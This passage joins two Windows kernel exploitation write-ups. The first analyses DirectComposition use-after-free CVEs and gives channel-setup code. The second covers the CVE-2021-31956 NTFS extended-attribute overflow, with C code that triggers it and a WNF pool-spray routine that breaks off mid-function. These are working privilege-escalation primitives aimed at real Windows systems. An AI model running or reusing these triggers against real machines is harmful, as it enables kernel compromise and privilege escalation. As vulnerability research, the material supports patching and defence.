	OUT PHANDLE hChannel,
	IN OUT PSIZE_T pSectionSize,
	OUT PVOID* pMappedAddress
	);

(2) NtDCompositionProcessChannelBatchBuffer batches multiple commands:

typedef NTSTATUS(*pNtDCompositionProcessChannelBatchBuffer)(
    IN HANDLE hChannel,
    IN DWORD dwArgStart,
    OUT PDWORD pOutArg1,
    OUT PDWORD pOutArg2
    );

The batched commands are stored in the pMappedAddress memory returned by NtDCompositionCreateChannel. The command list is as follows:

enum DCOMPOSITION_COMMAND_ID
{
	ProcessCommandBufferIterator,
	CreateResource,
	OpenSharedResource,
	ReleaseResource,
	GetAnimationTime,
	CapturePointer,
	OpenSharedResourceHandle,
	SetResourceCallbackId,
	SetResourceIntegerProperty,
	SetResourceFloatProperty,
	SetResourceHandleProperty,
	SetResourceHandleArrayProperty,
	SetResourceBufferProperty,
	SetResourceReferenceProperty,
	SetResourceReferenceArrayProperty,
	SetResourceAnimationProperty,
	SetResourceDeletedNotificationTag,
	AddVisualChild,
	RedirectMouseToHwnd,
	SetVisualInputSink,
	RemoveVisualChild
};

The commands related to triggering the vulnerability are CreateResource, SetResourceBufferProperty, and ReleaseResource. Each command has its own data structure.

(3) NtDCompositionCommitChannel serializes batch commands and sends them to dwm.exe for rendering through ALPC:

typedef NTSTATUS(*pNtDCompositionCommitChannel)(
	IN HANDLE hChannel,
	OUT PDWORD out1,
	OUT PDWORD out2,
	IN DWORD flag,
	IN HANDLE Object
	);
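To show how these entry points fit together, the fragment below resolves the exports from win32u.dll and opens a channel using the typedefs above. Error handling is minimal, the section size is an arbitrary illustrative value, and loading user32.dll first is an assumed prerequisite so that win32k syscalls are available to the process:

#include <windows.h>
#include <winternl.h>
#include <stdio.h>

typedef NTSTATUS (*pNtDCompositionCreateChannel)(
	PHANDLE hChannel, PSIZE_T pSectionSize, PVOID *pMappedAddress);

int main(void)
{
	HANDLE hChannel = NULL;
	SIZE_T sectionSize = 0x4000;    /* requested size of the shared command section */
	PVOID mapped = NULL;

	LoadLibraryW(L"user32.dll");    /* initialize the process for win32k syscalls */
	HMODULE win32u = LoadLibraryW(L"win32u.dll");
	if (win32u == NULL)
		return 1;

	pNtDCompositionCreateChannel CreateChannel =
		(pNtDCompositionCreateChannel)GetProcAddress(win32u, "NtDCompositionCreateChannel");
	if (CreateChannel == NULL)
		return 1;

	NTSTATUS status = CreateChannel(&hChannel, &sectionSize, &mapped);
	printf("NtDCompositionCreateChannel: 0x%08lX, %zu bytes mapped at %p\n",
	       (unsigned long)status, sectionSize, mapped);

	/* Batched commands (CreateResource, SetResourceBufferProperty, ReleaseResource, ...)
	 * would be written into `mapped` and submitted via
	 * NtDCompositionProcessChannelBatchBuffer, then committed with
	 * NtDCompositionCommitChannel. */
	return 0;
}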


CInteractionTrackerBindingManagerMarshaler::SetBufferProperty process analysis

First, the CreateResource command is used to create a CInteractionTrackerBindingManagerMarshaler resource (ResourceType = 0x59, hereinafter referred to as “Binding”) and a CInteractionTrackerMarshaler resource (ResourceType = 0x58, hereinafter referred to as “Tracker”).
Then the SetResourceBufferProperty command is called to set the Tracker object as the Binding object’s BufferProperty.
This process is handled by the function CInteractionTrackerBindingManagerMarshaler::SetBufferProperty, whose main flow is as follows:

The key steps are as follows:
(1) Check the input buffer subcmd == 0 && bufsize == 0xc
(2) Get Tracker objects tracker1 and tracker2 from channel-> resource_list (+0x38) according to the resourceId in the input buffer
(3) Check whether the types of tracker1 and tracker2 are CInteractionTrackerMarshaler (0x58)
(4) If binding->entry_count (+0x50) > 0, find the matched TrackerEntry from binding->tracker_list (+0x38) according to the handleID of tracker1 and tracker2, then update TrackerEntry->entry_id to the new_entry_id from the input buffer
(5) Otherwise, create a new TrackerEntry structure. If tracker1->binding == NULL || tracker2->binding == NULL, update their binding objects

After SetBufferProperty, a reference relationship between the binding object and the tracker object is as follows:

When the ReleaseResource command is used to release the Tracker object, the CInteractionTrackerMarshaler::ReleaseAllReferences function is called. ReleaseAllReferences internally checks whether the tracker object has a binding object:

If it does:
(1) Call RemoveTrackerBindings. In RemoveTrackerBindings, TrackerEntry.entry_id is set to 0 if the resourceID in tracker_list is equal to the resourceID of the freed tracker. Then CleanUpListItemsPendingDeletion is called to delete the TrackerEntry whose entry_id == 0 from tracker_list:

(2) Call ReleaseResource to decrement the refcnt of the binding object by 1.

(3) tracker->binding (+0x190) = 0

According to the above process, the input command buffer to construct a normal SetBufferProperty process is as follows:

After SetBufferProperty, the memory layout of the binding1, tracker1, and tracker2 objects is as follows:

After ReleaseResource tracker2, the memory layout of the binding1, tracker1, and tracker2 objects is as follows:

CVE-2020-1381

Looking back at the process of CInteractionTrackerBindingManagerMarshaler::SetBufferProperty: when new_entry_id != 0, a new TrackerEntry structure will be created:

If tracker1 and tracker2 have already been bound to binding1, then after binding tracker1 and tracker2 to binding2, a new TrackerEntry structure will be created for binding2. Since tracker->binding != NULL at this time, tracker->binding will still hold the binding1 pointer and will not be updated to the binding2 pointer. When the tracker is released, binding2->entry_list will retain a dangling pointer to the tracker.

Construct an input command buffer which can trigger the vulnerability as follows:

Memory layout after ReleaseResource tracker1:

It can be seen that after ReleaseResource tracker1, binding2->track_list[0] saves the dangling pointer of tracker1.

CVE-2021-26900

Analyzing the ‘new_entry_id != 0’ branch, the root cause of CVE-2020-1381 is that, when creating a TrackerEntry, the code did not check whether the tracker object had already been bound to a binding object. The patch adds a check of tracker->binding when creating the TrackerEntry:

CVE-2021-26900 is a bypass of the CVE-2020-1381 patch. The key to bypassing the patch is whether the condition tracker->binding == NULL can be re-established after the tracker has been bound to the binding object.
The bypass lies in the ‘update TrackerEntry’ branch:

When TrackerEntry->entry_id == 0, the RemoveBindingManagerReferenceFromTrackerIfNecessary function is called. It checks internally whether entry_id == 0 and then calls SetBindingManagerMarshaler to set tracker->binding = NULL:

Therefore, by setting entry_id=0 manually, the status of tracker->binding == NULL can be obtained, which can be used to bypass the CVE-2020-1381 patch.

Construct an input command buffer which can trigger the vulnerability as follows:

After setting entry_id=0 manually, the memory layout of binding1 and tracker1:

At this time, binding1->TrackerEntry still holds the pointer to tracker1, but tracker1->binding = NULL. Memory layout after ReleaseResource tracker1:

It can be seen that after ReleaseResource tracker1, binding1->track_list[0] saves the dangling pointer of tracker1.

CVE-2021-26868

Recall the method from CVE-2021-26900, which sets entry_id = 0 manually to obtain the tracker->binding == NULL state and bypass the CVE-2020-1381 patch, together with the process of CInteractionTrackerMarshaler::ReleaseAllReferences, which checks whether the tracker object has a binding object and then deletes the corresponding TrackerEntry.

So when entry_id is set to 0 manually, tracker->binding will be set to NULL. When the tracker object is then released via the ReleaseResource command, the TrackerEntry saved by the binding object will not be deleted, and a dangling pointer to the tracker object is obtained again.

Construct an input command buffer which can trigger the vulnerability as follows:

Memory layout after ReleaseResource tracker1:

It can be seen that after ReleaseResource tracker1, binding1->track_list[0] saves the dangling pointer of tracker1.

CVE-2021-33739

CVE-2021-33739 is different from the vulnerabilities in win32kbase.sys introduced in the previous sections. It is a UAF vulnerability in dwmcore.dll of the dwm.exe process. The root cause is in the ReleaseResource phase of CloseChannel. In the CInteractionTrackerBindingManager::RemoveTrackerBinding function call, when an element of Binding->hashmap (+0x40) is deleted, the hashmap is accessed directly without checking whether the Binding object has been released, which causes the UAF vulnerability.

Construct an input command buffer which can trigger the vulnerability as follows:

According to the previous analysis, in the normal scenario of a CInteractionTrackerBindingManagerMarshaler::SetBufferProperty function call, the Binding object should be bound to two different Tracker objects. However, if it is bound to the same Tracker object twice:

(1) Binding phase:
The CInteractionTrackerBindingManager::ProcessSetTrackerBindingMode function is called to process the binding operation; it calls CInteractionTrackerBindingManager::AddOrUpdateTrackerBindings internally to update Tracker->Binding (+0x278). When the Tracker has already been bound to the current Binding object, the binding operation will not be repeated:

Therefore, if the same Tracker object is already bound, the Binding object will not be bound again, and the refcnt of the Binding object is finally increased by only 1:

(2) Release phase:
After PreRender is finished, CComposition::CloseChannel will be called to close the Channel and release the Resources in the Resource HandleTable. The Binding object will be released first; at this time Binding->refcnt = 1:

Then the Tracker object will be released. CInteractionTrackerBindingManager::RemoveTrackerBindings will be called to release Tracker->Binding:

Three steps are included:
(1) Get the Tracker object from the TrackerEntry
(2) Erase the corresponding Tracker pointer from Binding->hashmap (+0x40)
(3) Remove Tracker->Binding (Binding->refcnt--) from the Tracker object

The key problem is: after completing the cleanup of the first Tracker object in the TrackerEntry, the Binding object may already be released. When the second Tracker object is prepared to be cleared, the validity of the (already released) Binding object is not checked before Binding->hashmap is accessed again, which results in an access violation exception:

Exploitation: Another way to occupy freed memory

For the kernel object UAF exploitation, according to the publicly available exploit samples[5], the Palette object is used to occupy the freed memory:

Use CInteractionTrackerBindingManagerMarshaler::EmitBoundTrackerMarshalerUpdateCommands function to access the placeholder objects:

The red box here is the virtual function CInteractionTrackerMarshaler::EmitUpdateCommands of the tracker1 and tracker2 objects (vtable + 0x50). Because the freed Tracker object has been reused by the Palette object, execution flow hijacking is achieved by forging a virtual table and writing another function pointer at fake Tracker vtable + 0x50.
The sample selects nt!SeSetAccessStateGenericMapping:

With the 16-byte write capability of nt!SeSetAccessStateGenericMapping, it sets _KTHREAD->PreviousMode = 0 to inject shellcode into the Winlogon process and complete the privilege escalation.

Another way to occupy freed memory

The exploitation of the Palette object is relatively common; is there some object in the DirectComposition component with a user-mode-controllable memory size that can be exploited instead?

The Binding and Tracker objects discussed above belong to the Resources of DirectComposition. DirectComposition contains many Resource objects, which are created by DirectComposition::CApplicationChannel::CreateInternalResource:
[figure]

Each Resource has a BufferProperty, which is set by the SetResourceBufferProperty command. Our objective is therefore to find a Resource whose SetResourceBufferProperty handler allocates a buffer with a user-mode controllable size. Through searching, I found CTableTransferEffectMarshaler::SetBufferProperty. The command format is as follows:
[figure]

When subcmd==0, the bufferProperty is stored at CTableTransferEffectMarshaler+0x58. The size of the bufferProperty is set by the user-mode input bufferSize, and the content is copied from the user-mode input buffer:
[figure]

Modifying the original sample to use the propertyBuffer of CTableTransferEffectMarshaler to occupy the freed memory:
[figure]

By debugging, we can see that the propertyBuffer of CTableTransferEffectMarshaler occupies the freed memory successfully:
[figure]

Finally, a screenshot of successful exploitation:
[figure]

References

[1] https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal
[2] https://www.zerodayinitiative.com/blog/2021/5/3/cve-2021-26900-privilege-escalation-via-a-use-after-free-vulnerability-in-win32k
[3] https://github.com/thezdi/PoC/blob/master/CVE-2021-26900/CVE-2021-26900.c
[4] https://ti.dbappsecurity.com.cn/blog/articles/2021/06/09/0day-cve-2021-33739/
[5] https://github.com/Lagal1990/CVE-2021-33739-POC

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes that many versions of Windows are affected and that in-the-wild exploitation of the issue has been observed in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Facility (WNF) being used by the in-the-wild attackers to enable novel exploit primitives. This led to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, let's assume there are two extended attributes within the file's extended attribute list.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 <= out_buf_length - 0, data would be copied into the buffer. We will use an out_buf_length of 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario where out_buf_length is instead 18 and the extended attributes are set up as follows.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration of the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 9 + 5 + 47
ea_block_size = 61

The resulting check will be:

ea_block_size <= out_buf_length - padding

61 <= 0 - 2

At this point the subtraction underflows (the values are unsigned, so 0 - 2 wraps around to a huge number), the check passes, and 61 bytes are copied off the end of the buffer, corrupting the adjacent memory.
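To make the unsigned underflow explicit, here is a minimal user-mode sketch of the same arithmetic (a model of the check only, not the ntfs.sys code):

#include <stdio.h>
#include <stdint.h>

int main(void) {
    uint32_t out_buf_length = 18;                  /* Length passed to NtQueryEaFile */
    uint32_t padding = 0;

    /* First Ea block: EaNameLength = 5, EaValueLength = 4 */
    uint32_t ea_block_size = 9 + 5 + 4;            /* 18 */
    if (ea_block_size <= out_buf_length - padding) {
        out_buf_length -= ea_block_size + padding; /* 0 bytes of output buffer left */
        padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;  /* 2 */
    }

    /* Second Ea block: EaNameLength = 5, EaValueLength = 47 */
    ea_block_size = 9 + 5 + 47;                    /* 61 */

    /* out_buf_length - padding is 0 - 2, which wraps to 0xFFFFFFFE on unsigned
       arithmetic, so the size check wrongly passes and the copy would overflow. */
    printf("61 <= %u ? %s\n", out_buf_length - padding,
           (ea_block_size <= out_buf_length - padding) ? "yes - overflow" : "no");
    return 0;
}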

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers of NtfsCommonQueryEa, we can see that the NtQueryEaFile system call path reaches the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described above.

In order to trigger the underflow, we need to set our output buffer size to be exactly the length of the first Ea Block.

Provided the first Ea Block requires padding, the second Ea Block will then be written out of bounds of the buffer when it is queried.

The interesting aspects of this vulnerability from an attacker's perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is whether this can be exploited reliably in the presence of modern kernel pool mitigations, and whether this is a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the first 18 bytes of the buffer.

There are then 2 bytes of padding, with the second extended attribute starting at offset 20.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block has the size with which we want our vulnerable buffer to be allocated (minus the pool header), and the second extended attribute block holds the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed to NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow a copy of an attacker-controlled size.

So in summary: once the extended attributes have been written to the file using NtSetEaFile, it is then necessary to trigger the vulnerable code path by querying them with NtQueryEaFile, setting the output buffer size to be exactly the same size as our first extended attribute.
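As a rough illustration, the following sketch sets up the two extended attributes and triggers the query. The FILE_FULL_EA_INFORMATION layout is the one shown above; the NtSetEaFile/NtQueryEaFile prototypes are the commonly published undocumented ones and should be treated as assumptions (resolve them from ntdll.dll or link against ntdll.lib), and error handling is omitted.

#include <windows.h>
#include <winternl.h>

typedef struct _FILE_FULL_EA_INFORMATION {
    ULONG  NextEntryOffset;
    UCHAR  Flags;
    UCHAR  EaNameLength;
    USHORT EaValueLength;
    CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

NTSTATUS NTAPI NtSetEaFile(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock,
                           PVOID Buffer, ULONG Length);
NTSTATUS NTAPI NtQueryEaFile(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock,
                             PVOID Buffer, ULONG Length, BOOLEAN ReturnSingleEntry,
                             PVOID EaList, ULONG EaListLength, PULONG EaIndex,
                             BOOLEAN RestartScan);

void TriggerEaOverflow(HANDLE file)
{
    UCHAR eaBuf[0x200] = { 0 };
    IO_STATUS_BLOCK iosb;

    /* First EA: 9 + 5 + 4 = 18 bytes, the size we want the kernel buffer to be. */
    PFILE_FULL_EA_INFORMATION ea1 = (PFILE_FULL_EA_INFORMATION)eaBuf;
    ea1->NextEntryOffset = 20;            /* 18 rounded up to 4-byte alignment */
    ea1->EaNameLength    = 5;
    ea1->EaValueLength   = 4;
    memcpy(ea1->EaName, "AAAAA", 5);      /* name (NUL terminator already zero) */
    memset(ea1->EaName + 6, 'B', 4);      /* value */

    /* Second EA: 9 + 5 + 47 = 61 bytes of overflow data, ending the chain. */
    PFILE_FULL_EA_INFORMATION ea2 = (PFILE_FULL_EA_INFORMATION)(eaBuf + 20);
    ea2->NextEntryOffset = 0;
    ea2->EaNameLength    = 5;
    ea2->EaValueLength   = 47;
    memcpy(ea2->EaName, "CCCCC", 5);
    memset(ea2->EaName + 6, 'D', 47);

    NtSetEaFile(file, &iosb, eaBuf, 20 + 61);

    /* Query with an output buffer of exactly 18 bytes to underflow the check. */
    UCHAR outBuf[18];
    NtQueryEaFile(file, &iosb, outBuf, sizeof(outBuf), FALSE, NULL, 0, NULL, TRUE);
}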

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There have been significant changes, bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and for proposing some initial techniques. Without this paper having been published already, exploitation of this issue would have been significantly harder.

Firstly, the important thing is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. The chunk will live within one of the four segment heap “backends”:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of size 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation being below 0x200 and therefore being serviced by the LFH.

We can step through the corruption of the adjacent chunk by setting a conditional breakpoint on the following location, and then breakpointing on the memcpy location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'"

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk, and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually real; however, it demonstrates that even with more restrictive constraints these can often be worked around, and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that the chunk size calculation is 0x12 + 0x10 = 0x22, which is then rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facility (WNF) is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF-related structures are used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into the non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow occurs within the paged pool, we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the Length argument is our v6 value, with an additional 16 (0x10) bytes added for the header which is prepended.

Therefore, we have a 0x10-byte _POOL_HEADER as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function, we can use a conditional breakpoint:

bp nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);
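
A minimal spray loop built from these two calls might look like the following sketch. The prototypes, together with the WnfTemporaryStateName (3) and WnfDataScopeMachine (4) values, follow the commonly published undocumented definitions and should be treated as assumptions; resolve the functions from ntdll.dll or link against ntdll.lib.

#include <windows.h>
#include <winternl.h>

typedef struct _MY_WNF_STATE_NAME { ULONGLONG Data; } MY_WNF_STATE_NAME;

NTSTATUS NTAPI NtCreateWnfStateName(MY_WNF_STATE_NAME *StateName, ULONG NameLifetime,
                                    ULONG DataScope, BOOLEAN PersistData,
                                    const VOID *TypeId, ULONG MaximumStateSize,
                                    PSECURITY_DESCRIPTOR SecurityDescriptor);
NTSTATUS NTAPI NtUpdateWnfStateData(const MY_WNF_STATE_NAME *StateName, const VOID *Buffer,
                                    ULONG Length, const VOID *TypeId,
                                    const VOID *ExplicitScope, ULONG MatchingChangeStamp,
                                    ULONG CheckStamp);

#define SPRAY_COUNT 4096

static MY_WNF_STATE_NAME g_names[SPRAY_COUNT];

void SprayWnf(PSECURITY_DESCRIPTOR psd, ULONG alloc_size)
{
    UCHAR buf[0x1000];
    memset(buf, 'A', sizeof(buf));

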